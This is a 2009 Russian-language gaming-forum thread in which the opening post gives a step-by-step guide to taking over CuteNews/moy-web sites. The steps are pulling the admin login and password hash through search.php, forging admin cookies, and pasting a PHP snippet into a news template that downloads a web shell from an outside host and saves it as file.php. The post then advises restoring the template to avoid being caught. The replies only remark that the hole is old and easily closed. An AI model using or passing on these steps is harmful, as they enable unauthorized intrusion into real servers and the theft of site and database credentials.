Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Взлом сервера через CuteNews

-

Архив

- Архив Lineage 2 - собрание неактуальных на данный момент тем. Может быть полезен для изучения истории

 
 
Опции темы
Старый 17.06.2009, 18:56   #1
Заблокирован
 Пехотинец
Аватар для Silence
 
Silence скоро будет известенSilence скоро будет известенSilence скоро будет известенSilence скоро будет известен
Регистрация: 17.06.2009
Сообщений: 60
Популярность: 382
Сказал(а) спасибо: 63
Поблагодарили 151 раз(а) в 49 сообщениях
 
По умолчанию Взлом сервера через CuteNews

1. Находим сайт на движке moy-web.
2. После того, как нашли сайт, ищем файл search.php по адресу .../news/search.php
3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1.
4. Теперь нам надо узнать логин админа, для этого переходим сюда и вводим полный путь к search.php
5. Получили логин админа и теперь узнаем хэш админа, для этого переходим сюда и вводим Логин (у меня root) и путь к файлу search.php
6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e)

Устанавливаем [Ссылки могут видеть только зарегистрированные пользователи. ] и [Ссылки могут видеть только зарегистрированные пользователи. ] для него.
Дальше идем Инструменты=>Редактор Cookies=>Добавить
Заполняем:
1. Имя=>username
2. Содержимое=>Логин администратора (у меня root)
3. Узел=> путь к сайту (БЕЗ HTTP:// напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить:
1. Имя=>md5_password
2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e)
3. Узел=> путь к сайту (БЕЗ [Ссылки могут видеть только зарегистрированные пользователи. ] напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Сохраняем… Теперь идем в админку… Воаля, вы залогинены)))

Не спешите добавить похабную новость, давайте зальем туда шелл, что бы узнать пароли от mysql и вообще управлять содержимым сайта.

Заливаем шелл:
Настройкa блока новостей=>Редактировать шаблоны=>Активные новости
Удаляем от туда всё и вставляем следующее:

Код:
HTML;
$file = file_get_contents('http://shellss.by.ru/file.txt');
$brd = fopen('file.php','w+');
$write = fwrite($brd, $file);
Сохранить…

Через пару минут наш файл загрузится.
Заходим .../news/file.php вводим логин-1 пароль-1
Потом не забудьте изменить шаблон активных новостей "как было", что бы не спалиться.
 
2 пользователя(ей) сказали cпасибо:
Razzor (17.06.2009), Seruy (19.06.2009)
Старый 17.06.2009, 19:04   #2
 Разведчик
Аватар для Жорик
 
Жорик на правильном пути
Регистрация: 07.06.2009
Сообщений: 3
Популярность: 20
Сказал(а) спасибо: 21
Поблагодарили 5 раз(а) в 4 сообщениях
 
По умолчанию Re: Взлом сервера через CuteNews

А где ссылка на источник? этой статье уже несколько лет, каждый кто держит сервер знает что нужно удалять файл Search.php.
имхо Баян.
 
Старый 18.06.2009, 10:51   #3
 Старший сержант
Аватар для wagan
 
wagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компании
Регистрация: 22.04.2009
Сообщений: 183
Популярность: 952
Сказал(а) спасибо: 57
Поблагодарили 133 раз(а) в 46 сообщениях
Отправить сообщение для wagan с помощью ICQ
 
По умолчанию Re: Взлом сервера через CuteNews

хотя может где-то и прокатит
 
Старый 18.06.2009, 11:25   #4
 Пехотинец
Аватар для Jenyok
 
Jenyok скоро будет известенJenyok скоро будет известенJenyok скоро будет известенJenyok скоро будет известен
Регистрация: 22.04.2009
Сообщений: 98
Популярность: 378
Сказал(а) спасибо: 124
Поблагодарили 139 раз(а) в 73 сообщениях
Отправить сообщение для Jenyok с помощью ICQ
 
По умолчанию Re: Взлом сервера через CuteNews

Цитата:
Сообщение от waganПосмотреть сообщение
хотя может где-то и прокатит

На не стабильных серверах которые работают несколько часов в день, админы которых новички в серверном деле. Более менее знающий админ удаляет файл search.php.
Да и сама обвязка Moy-Web уже теряет актуальность, многие переходят на Dle или Kasseler CMS.
 
 


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом MySQL wagan Баги и читы Lineage 2 1 25.08.2009 10:46
CuteNews Lancer Общение и обсуждение, архив Lineage 2 3 17.05.2009 23:21

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 18:53.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net